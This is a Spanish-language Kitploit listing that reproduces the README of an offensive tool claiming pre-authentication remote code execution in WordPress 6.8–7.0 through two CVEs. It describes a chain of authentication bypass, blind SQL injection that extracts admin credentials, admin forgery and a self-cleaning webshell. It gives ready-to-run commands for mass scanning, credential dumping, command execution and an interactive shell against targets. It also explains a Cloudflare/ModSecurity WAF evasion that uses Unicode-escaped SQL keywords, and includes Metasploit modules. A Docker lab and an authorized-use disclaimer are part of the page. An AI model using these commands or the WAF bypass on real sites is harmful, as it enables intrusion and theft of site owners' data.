Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wp2shell-Exploit-Waf-Bypass — Exploit de RCE pre-autenticación de WordPress + Escáner + Bypass de WAF | CVE-2026-63030 + CVE-2026-60137 | Go + Python + módulos de Metasploit + laboratorio Docker | Kitploit
Herramientas/GitHubGitHub/m4xsec/wp2shell-exploit-waf-bypass
Escáneres de Vulnerabilidades WebExplotaciónExplotación de Aplicaciones WebPruebas de Seguridad de APIsEvasión de WAFPruebas de PenetraciónRed Teaming
GitHubm4xsec/wp2shell-exploit-waf-bypass

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

wp2shell-Exploit-Waf-Bypass

Exploit de RCE pre-autenticación de WordPress + Escáner + Bypass de WAF | CVE-2026-63030 + CVE-2026-60137 | Go + Python + módulos de Metasploit + laboratorio Docker

Ver Repositorio
2hace 11 díasAún no revisado
root@kitploit:~
                ___      __         ___
 _      _____  |__ \ ___/ /_  ___  / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / / 
| |/ |/ /  __// __//_  / / / /  __/ / /  
|__/|__/\___//____//__/_/ /_/\___/_/_/   
                                         
  WordPress RCE sin autenticación — CVE-2026-63030 + CVE-2026-60137
  por Venexy (M4xSec)

GitHub Release License: MIT Go Metasploit

Ejecución remota de código sin autenticación en WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1. Parcheado en 6.8.6, 6.9.5, 7.0.2.

Instalación rápida

root@kitploit:~
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell

# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go

Cadena de ataque

  1. Confusión de rutas mediante peticiones batch anidadas con una ruta inicial no válida que evita la autenticación
  2. Inyección SQL ciega basada en tiempo que extrae el prefijo de las tablas, el ID del administrador y las credenciales
  3. Falsificación de filas basada en UNION que siembra las cachés oEmbed (SQLi de solo lectura → escrituras en la BD)
  4. Elevación de changeset y parse_request() reentrante que forja a un administrador
  5. Subida de un plugin que despliega un webshell autolimpiable
  6. Ejecución de comandos y limpieza automática

Herramientas

Escáner Go (go-scanner/wp2shell-master.go)

Binario todo en uno: escaneo, comprobación, lectura, explotación y shell interactiva.

root@kitploit:~
go build -o wp2shell-master go-scanner/wp2shell-master.go

# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20

# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0

# Extract admin creds
./wp2shell-master read https://target.com --preset users

# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth

# Interactive shell
./wp2shell-master rce https://target.com -i -y

Herramientas de evasión de WAF (waf-bypass/)

Scripts independientes para la evasión de Cloudflare/ModSecurity mediante escape Unicode JSON de palabras clave SQL.

  • core.py — Motor compartido de SQLi ciega con evasión de WAF
  • dump_version.py — Extraer @@version
  • dump_dbname.py — Extraer DATABASE()
  • dump_tables.py — Enumerar tablas
  • dump_columns.py — Enumerar columnas
  • rce_shell.py — Cadena RCE completa con evasión de WAF

Módulos Metasploit (metasploit-modules/)

  • wp2shell_rce.rb — Módulo de explotación RCE completo (PR #21760)
  • wp2shell_scanner.rb — Escáner no destructivo (PR #21761)

Instalación local:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb

Técnica de evasión del WAF

El WAF de Cloudflare inspecciona los bytes JSON crudos, pero no decodifica las secuencias de escape \uXXXX antes de la coincidencia de patrones. El json_decode() de PHP de WordPress las decodifica de forma transparente.

  • SLEEP → SLEEP — evita la detección de palabras clave
  • Primer de dos puntos (: en lugar de http://:) — más corto, evita las reglas de patrones URI
  • Ruta permanente /wp-json/batch/v1 — evita el bloqueo de ?rest_route=
  • Las cabeceras Origin y Referer del dominio de destino — satisfacen las comprobaciones CORS/mismo origen

Laboratorio Docker

Laboratorio sin WAF (puerto 8888)

root@kitploit:~
cd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!

Laboratorio con WAF (puerto 9999)

ModSecurity CRS (OWASP) con reglas estilo Cloudflare: evasión Unicode confirmada.

root@kitploit:~
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999

Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas. Úsala únicamente contra sistemas que poseas o para los que tengas permiso escrito explícito de prueba. El acceso no autorizado es ilegal.

Licencia

MIT

root@kitploit:~
Descargar herramienta